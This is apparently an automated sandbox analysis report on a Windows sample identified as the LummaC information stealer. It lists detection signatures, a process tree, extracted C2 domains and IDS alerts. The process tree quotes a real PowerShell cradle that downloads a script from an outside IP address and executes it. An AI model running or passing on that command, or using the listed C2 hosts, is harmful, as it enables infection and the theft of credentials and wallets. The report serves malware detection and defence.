Edit tour
Windows
Analysis Report
7IXl1M9JGV.exe
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64native
- 7IXl1M9JGV.exe (PID: 9084 cmdline:
"C:\Users\ user\Deskt op\7IXl1M9 JGV.exe" MD5: 826AC9D03E37048DF300B013335098D9) - conhost.exe (PID: 9092 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) - cmd.exe (PID: 9144 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l -Command "iwr -use b 'http:// 147.45.44. 131/infopa ge/bhdh552 .ps1' -Hea ders @{'X- Special-He ader'='qIn x8F3tuJDHX gOEfPJjbai pYaSE1mobJ 2YRyo2rjNg nVDhJvevN8 R2ku8oPCBo nhmpzFb2GY qPiLhJq'} | iex" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 9176 cmdline:
powershell -Command "iwr -useb 'http://1 47.45.44.1 31/infopag e/bhdh552. ps1' -Head ers @{'X-S pecial-Hea der'='qInx 8F3tuJDHXg OEfPJjbaip YaSE1mobJ2 YRyo2rjNgn VDhJvevN8R 2ku8oPCBon hmpzFb2GYq PiLhJq'} | iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - csc.exe (PID: 8728 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\qh4rlt ex\qh4rlte x.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 8748 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES267D.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\qh4 rltex\CSCE 36AEDAA1DE D41D2AE2F4 E1F8F6B418 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - RegAsm.exe (PID: 1752 cmdline:
"C:\\Windo ws\\Micros oft.NET\\F ramework\\ v4.0.30319 \\RegAsm.e xe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - chrome.exe (PID: 4212 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --pr ofile-dire ctory="Def ault" MD5: BB7C48CDDDE076E7EB44022520F40F77) - chrome.exe (PID: 1664 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-subpr oc-heap-pr ofiling -- field-tria l-handle=2 240,i,9410 3383382456 58404,8663 6072276038 81870,2621 44 --varia tions-seed -version=2 0240909-18 0142.41600 0 --mojo-p latform-ch annel-hand le=2252 /p refetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77) - chrome.exe (PID: 9224 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --video-ca pture-use- gpu-memory -buffer -- no-subproc -heap-prof iling --fi eld-trial- handle=380 8,i,941033 8338245658 404,866360 7227603881 870,262144 --variati ons-seed-v ersion=202 40909-1801 42.416000 --mojo-pla tform-chan nel-handle =5316 /pre fetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
- svchost.exe (PID: 7444 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: F586835082F632DC8D9404D83BC16316)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["conceszustyb.shop", "moutheventushz.shop", "respectabosiz.shop", "worddosofrm.shop", "mutterissuen.shop", "nightybinybz.shop", "bakedstusteeb.shop", "standartedby.shop", "knifedxejsu.cyou"], "Build id": "HpOoIh--@topgcr"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:14.245210+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49711 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:15.081146+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49712 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:21.478914+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49720 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:22.553138+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49724 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:23.297760+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49725 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:24.379486+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49727 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:25.581150+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49728 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:26.470376+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49729 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:28.150953+0100 | 2028371 | 3 | Unknown Traffic | 192.168.11.20 | 49730 | 104.21.19.177 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:14.746759+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.11.20 | 49711 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:15.923601+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.11.20 | 49712 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:28.686722+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.11.20 | 49730 | 104.21.19.177 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:14.746759+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.11.20 | 49711 | 104.21.19.177 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:15.923601+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.11.20 | 49712 | 104.21.19.177 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:14.245210+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49711 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:15.081146+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49712 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:21.478914+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49720 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:22.553138+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49724 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:23.297760+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49725 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:24.379486+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49727 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:25.581150+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49728 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:26.470376+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49729 | 104.21.19.177 | 443 | TCP |
2024-11-07T17:55:28.150953+0100 | 2057285 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 49730 | 104.21.19.177 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:11.639670+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 147.45.44.131 | 80 | TCP |
2024-11-07T17:55:12.108473+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 147.45.44.131 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:13.869866+0100 | 2057284 | 1 | Domain Observed Used for C2 Detected | 192.168.11.20 | 51454 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:27.930071+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.11.20 | 49729 | 104.21.19.177 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-07T17:55:12.109154+0100 | 2800029 | 1 | Attempted User Privilege Gain | 147.45.44.131 | 80 | 192.168.11.20 | 49710 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Code function: | 7_2_00418D6F |
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Code function: | 0_2_00007FF7D77F8D4C |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Code function: | 7_2_0041B840 | |
Source: | Code function: | 7_2_0041B840 | |
Source: | Code function: | 7_2_0043D840 | |
Source: | Code function: | 7_2_0043D840 | |
Source: | Code function: | 7_2_004358F0 | |
Source: | Code function: | 7_2_0043F880 | |
Source: | Code function: | 7_2_00439140 | |
Source: | Code function: | 7_2_00439140 | |
Source: | Code function: | 7_2_00439140 | |
Source: | Code function: | 7_2_0043F9D0 | |
Source: | Code function: | 7_2_0041DAD0 | |
Source: | Code function: | 7_2_0041A360 | |
Source: | Code function: | 7_2_00438330 | |
Source: | Code function: | 7_2_00440330 | |
Source: | Code function: | 7_2_00429C7C | |
Source: | Code function: | 7_2_0043CCB0 | |
Source: | Code function: | 7_2_0043CCB0 | |
Source: | Code function: | 7_2_00418D6F | |
Source: | Code function: | 7_2_00418D6F | |
Source: | Code function: | 7_2_0041D570 | |
Source: | Code function: | 7_2_0042B503 | |
Source: | Code function: | 7_2_0042B503 | |
Source: | Code function: | 7_2_00417502 | |
Source: | Code function: | 7_2_00439D20 | |
Source: | Code function: | 7_2_00418602 | |
Source: | Code function: | 7_2_004247C0 | |
Source: | Code function: | 7_2_004247C0 | |
Source: | Code function: | 7_2_00438FC0 | |
Source: | Code function: | 7_2_004387C0 | |
Source: | Code function: | 7_2_00401000 | |
Source: | Code function: | 7_2_00401000 | |
Source: | Code function: | 7_2_0041102F | |
Source: | Code function: | 7_2_0042B0EC | |
Source: | Code function: | 7_2_004230A6 | |
Source: | Code function: | 7_2_0040F0B0 | |
Source: | Code function: | 7_2_00428140 | |
Source: | Code function: | 7_2_00439940 | |
Source: | Code function: | 7_2_00408960 | |
Source: | Code function: | 7_2_0041F963 | |
Source: | Code function: | 7_2_004269E0 | |
Source: | Code function: | 7_2_004269E0 | |
Source: | Code function: | 7_2_00401277 | |
Source: | Code function: | 7_2_00407210 | |
Source: | Code function: | 7_2_00432A10 | |
Source: | Code function: | 7_2_004222ED | |
Source: | Code function: | 7_2_00436350 | |
Source: | Code function: | 7_2_00421379 | |
Source: | Code function: | 7_2_004293B3 | |
Source: | Code function: | 7_2_0043BBB1 | |
Source: | Code function: | 7_2_0043BBB1 | |
Source: | Code function: | 7_2_00424C70 | |
Source: | Code function: | 7_2_0043FCC0 | |
Source: | Code function: | 7_2_004194AD | |
Source: | Code function: | 7_2_004014B3 | |
Source: | Code function: | 7_2_00429C75 | |
Source: | Code function: | 7_2_00404D50 | |
Source: | Code function: | 7_2_00419D70 | |
Source: | Code function: | 7_2_0041C513 | |
Source: | Code function: | 7_2_0041C52A | |
Source: | Code function: | 7_2_00423DD0 | |
Source: | Code function: | 7_2_00405DE0 | |
Source: | Code function: | 7_2_0040A5F0 | |
Source: | Code function: | 7_2_00438580 | |
Source: | Code function: | 7_2_00411DB0 | |
Source: | Code function: | 7_2_0043B65F | |
Source: | Code function: | 7_2_00423E07 | |
Source: | Code function: | 7_2_004266F0 | |
Source: | Code function: | 7_2_004266F0 | |
Source: | Code function: | 7_2_004366F7 | |
Source: | Code function: | 7_2_004366F7 | |
Source: | Code function: | 7_2_00420750 | |
Source: | Code function: | 7_2_00438700 | |
Source: | Code function: | 7_2_0040FF28 | |
Source: | Code function: | 7_2_00426FD0 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | HTTP traffic detected: |